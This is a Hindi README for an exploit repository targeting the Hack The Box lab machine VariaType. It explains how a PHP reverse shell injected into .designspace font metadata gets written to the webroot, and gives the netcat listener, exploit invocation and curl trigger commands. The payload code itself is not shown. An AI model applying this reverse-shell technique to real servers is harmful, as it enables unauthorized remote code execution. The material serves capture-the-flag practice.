
VariaType HTB मशीन के लिए शोषण जो fontTools में XML इंजेक्शन का उपयोग करके .designspace मेटाडेटा में PHP रिवर्स शेल पेलोड के माध्यम से RCE प्राप्त करता है।
इस रिपॉजिटरी में Hack The Box पर स्थित VariaType मशीन के लिए एक विशेष एक्सप्लॉइट शामिल है। यह एक्सप्लॉइट fontTools लाइब्रेरी या वेब एप्लिकेशन द्वारा .designspace XML फ़ाइलों और मेटाडेटा इंटरपोलेशन को संभालने में मौजूद कमज़ोरी का लाभ उठाकर रिमोट कोड एक्ज़ीक्यूशन (RCE) प्राप्त करता है।
कमज़ोरी फ़ॉन्ट जनरेशन प्रक्रिया में मौजूद है। एक दुर्भावनापूर्ण designspace फ़ाइल तैयार करके, हम फ़ॉन्ट के मेटाडेटा (विशेष रूप से <labelname> फ़ील्ड) में PHP रिवर्स शेल पेलोड इंजेक्ट कर सकते हैं। जब सर्वर इन फ़ाइलों को प्रोसेस करके एक वेरिएबल फ़ॉन्ट तैयार करता है, तो यह आउटपुट को उपयोगकर्ता-परिभाषित पथ पर लिखता है, जिससे हम वेबरूट में एक .php शेल ड्रॉप कर सकते हैं।
fontTools का उपयोग करके मान्य source-light.ttf और source-regular.ttf मास्टर फ़ॉन्ट बनाता है।designspace फ़ाइल जनरेट करता है।.php फ़ाइल के रूप में सहेजने का प्रयास करता है।आपके पास Python 3 इंस्टॉल होना चाहिए और निम्नलिखित लाइब्रेरीज़ भी:
pip install fontTools requests
अपनी स्थानीय मशीन (या Pwnbox) पर, Netcat लिसनर शुरू करें:
nc -lvnp 4444
अपना HTB VPN IP और लिसनर पोर्ट प्रदान करके स्क्रिप्ट चलाएँ:
python3 exploit.py --ip <YOUR_IP> --port 4444
यदि अपलोड 200 OK (या कभी-कभी 500 भी, यदि त्रुटि से पहले प्रोसेसिंग हो जाती है) लौटाता है, तो स्क्रिप्ट फ़ाइल नाम प्रदान करेगी। इसे curl या अपने ब्राउज़र के माध्यम से एक्सेस करें:
curl http://portal.variatype.htb/shell_xxxxxx.php
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
--ip | आपका लिसनर IP (VPN) | आवश्यक |
--port | आपका लिसनर पोर्ट | आवश्यक |
--path | शेल के लिए लक्ष्य पथ | /var/www/portal.variatype.htb/public |
--url | अपलोड एंडपॉइंट | http://variatype.htb/tools/.../process |
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। पूर्व अनुमति के बिना लक्ष्यों तक पहुँचना या उन पर हमला करना अवैध है।
README.md के रूप में सहेजें।exploit.py है या ऊपर दिए गए कमांड्स में फ़ाइल नाम अपडेट करें।